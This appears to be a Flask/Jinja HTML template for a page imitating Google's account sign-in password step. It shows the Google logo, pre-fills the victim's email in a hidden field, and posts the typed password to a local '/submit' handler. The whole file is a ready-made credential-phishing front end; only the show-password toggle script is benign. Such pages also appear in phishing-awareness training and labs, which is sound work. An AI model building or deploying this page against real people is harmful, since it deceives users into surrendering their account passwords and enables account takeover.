<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Welcome - Google Accounts</title>
  <link rel="stylesheet" href="{{ url_for('static', filename='style.css') }}" />
</head>
<body class="password-page">
  <div class="container">
    <div class="card">
      <div class="card-left">
        <img src="{{ url_for('static', filename='GoogleIcon.png') }}" alt="Google logo" class="logo logo-password" />
        <div class="signin-text">
          <h1>Welcome</h1>
          <div class="account-box">
            <img src="/static/icon-logo.png" alt="user icon" class="user-icon" />
            <span class="email">{{ email }}</span>
            <span class="dropdown-icon">▾</span>
          </div>
        </div>
      </div>
      <div class="form-password">
        <form method="post" action="/submit">
            <input type="hidden" name="email" value="{{ email }}">
            <div class="input-container">
                <input type="password" id="password" name="password" placeholder=" " required />
                <label for="password">Enter your password</label>
            </div>
            <div class="checkbox-container">
                <input type="checkbox" id="show-password" />
                <label for="show-password">Show password</label>
            </div>
            <div class="form-lower">
            <div class="buttons">
                <a href="#" class="create">Try another way</a>
                <button type="submit">Next</button>
            </div>
            </div>
        </form>
      </div>
    </div>

    <div class="footer">
      <div class="footer-select">
        <select>
          <option>English (United States)</option>
        </select>
      </div>
      <div class="footer-links">
        <a href="#">Help</a>
        <a href="#">Privacy</a>
        <a href="#">Terms</a>
      </div>
    </div>
  </div>
  <script>
    const toggle = document.getElementById('show-password');
    const password = document.getElementById('password');
    toggle.addEventListener('change', () => {
        password.type = toggle.checked ? 'text' : 'password';
    });
    </script>
</body>
</html>
